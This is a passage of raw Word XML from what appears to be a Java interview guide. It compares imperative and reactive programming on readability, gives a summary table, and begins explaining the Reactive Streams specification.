    </w:p>
    <w:p w14:paraId="51A9BA2B"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Libraries such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RxJava</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Project Reactor</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Akka Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Vert.x</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are designed to simplify the writing of </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous, non-blocking code</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7757E793"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Web frameworks like </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> use these principles for building highly scalable and reactive web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025BD816" w14:textId="77777777" w:rsidR="005164BC" w:rsidRPr="00BF46DF" w:rsidRDefault="00000000" w:rsidP="00BF46D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AB95B0">
          <v:rect id="_x0000_i2269" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="187D63D7" w14:textId="77777777" w:rsidR="005164BC" w:rsidRPr="00BF46DF" w:rsidRDefault="005164BC"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7. Code Readability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6BEA27"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Imperative Programming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5002A9BE"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Code tends to be </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>easier to understand</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because it follows a clear and linear sequence of operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1136B41F"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Easier to follow for small applications or systems with few data dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA8B16C"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Reactive Programming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AB63DC"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Code can become </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>complex</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> due to the asynchronous nature of execution, especially when dealing with </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple concurrent operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and event handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E22D0DB" w14:textId="77777777" w:rsidR="005164BC" w:rsidRPr="00BF46DF" w:rsidRDefault="005164BC"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Requires understanding of </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>observers</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> concepts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B3248C" w14:textId="77777777" w:rsidR="005164BC" w:rsidRPr="00BF46DF" w:rsidRDefault="00000000" w:rsidP="00BF46D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B9A6D49">
          <v:rect id="_x0000_i2270" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8DD12B" w14:textId="77777777" w:rsidR="005164BC" w:rsidRPr="00BF46DF" w:rsidRDefault="005164BC"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Summary of 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4"/>
        <w:gridCol w:w="3232"/>
        <w:gridCol w:w="3469"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BF46DF" w:rsidRPr="00BF46DF" w14:paraId="0E6723F9" w14:textId="77777777" w:rsidTr="005164BC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A9E554E" w14:textId="77777777" w:rsidR="005164BC" w:rsidRPr="00BF46DF" w:rsidRDefault="005164BC"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="573B86BF" w14:textId="77777777" w:rsidR="005164BC" w:rsidRPr="00BF46DF" w:rsidRDefault="005164BC"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Imperative Programming</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21AD3F6E" w14:textId="77777777" w:rsidR="005164BC" w:rsidRPr="00BF46DF" w:rsidRDefault="005164BC"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Reactive Programming</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF46DF" w:rsidRPr="00BF46DF" w14:paraId="6FEA48A1" w14:textId="77777777" w:rsidTr="005164BC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25DBC619"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Execution Flow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B4B8139"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Step-by-step, synchronous</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AA9673D"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Asynchronous, event-driven</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF46DF" w:rsidRPr="00BF46DF" w14:paraId="1C146C13" w14:textId="77777777" w:rsidTr="005164BC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09F12E8B"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Concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04934D43"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Blocking, sequential execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2207B0C0"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Non-blocking, asynchronous</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF46DF" w:rsidRPr="00BF46DF" w14:paraId="73748538" w14:textId="77777777" w:rsidTr="005164BC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5682E2D4"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State Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7644B541"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Direct manipulation, mutable state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44EA8170"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Streams and immutable state</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF46DF" w:rsidRPr="00BF46DF" w14:paraId="726C80BC" w14:textId="77777777" w:rsidTr="005164BC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5827A5E3"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Error Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0413C8B7"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Exceptions, synchronous</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0607C064"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Errors handled reactively in streams</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF46DF" w:rsidRPr="00BF46DF" w14:paraId="36959945" w14:textId="77777777" w:rsidTr="005164BC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4793A648"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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="065EE6E9"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Simple, sequential tasks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01CD2874"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High concurrency, real-time data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF46DF" w:rsidRPr="00BF46DF" w14:paraId="73A4BFB8" w14:textId="77777777" w:rsidTr="005164BC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2425CF93"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Libraries/Frameworks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59990D46"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Threading, CompletableFuture, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F9F0C39"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RxJava, Project Reactor, Akka Streams</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="125BEDF5" w14:textId="77777777" w:rsidR="005164BC" w:rsidRPr="00BF46DF" w:rsidRDefault="00000000" w:rsidP="00BF46D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E5F5606">
          <v:rect id="_x0000_i2271" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC48A12" w14:textId="77777777" w:rsidR="005164BC" w:rsidRPr="00BF46DF" w:rsidRDefault="005164BC"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF1CBF9"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Imperative Programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, focuses on </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>how</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to do things, and is ideal for simple, step-by-step processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702AFDF9"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Reactive Programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, focuses on </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>what</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to do things, and is designed for systems that need to handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>concurrent, event-driven tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> efficiently, like real-time data streams, web services, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5E36AA" w14:textId="77777777" w:rsidR="005164BC" w:rsidRPr="00BF46DF" w:rsidRDefault="005164BC"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Each paradigm has its place, and you should choose one depending on the problem you are solving.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F8C51B"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B4F5549">
          <v:rect id="_x0000_i2272" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AE7346" w14:textId="28018486"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494" w:name="_Toc196307974"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can you explain the reactive stream specification (Reactive Streams API)</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="494"/>
    </w:p>
    <w:p w14:paraId="11E0AB7A" w14:textId="44ED21E9" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822" w:rsidP="00BF46DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive Streams Specification</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (also known as the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive Streams API</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) is a standard for asynchronous stream processing with non-blocking backpressure in Java. It was designed to allow libraries and frameworks to support reactive programming and to communicate asynchronously while maintaining a reliable flow of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731F1D31"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The Reactive Streams API is a key part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> model, especially when dealing with </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>streaming data</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
